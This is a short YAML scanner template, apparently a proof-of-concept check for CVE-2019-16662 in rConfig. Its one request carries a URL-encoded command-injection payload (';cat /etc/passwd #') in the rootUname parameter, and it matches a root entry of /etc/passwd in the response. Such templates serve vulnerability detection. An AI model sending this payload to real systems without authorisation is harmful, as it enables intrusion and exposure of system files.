id:
name: CVE-2019-16662
transport: http
tags:
  - Rconfig
rules:
  req:
    request:
      cache: true
      method: GET
      path: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
      follow_redirects: true
    expression: response.status==200 && 'root:.*:0:0:'.bmatches(response.body)
expression: req()
detail:
  vulnerability:
    proof:
      info: "存在CVE-2019-16662漏洞"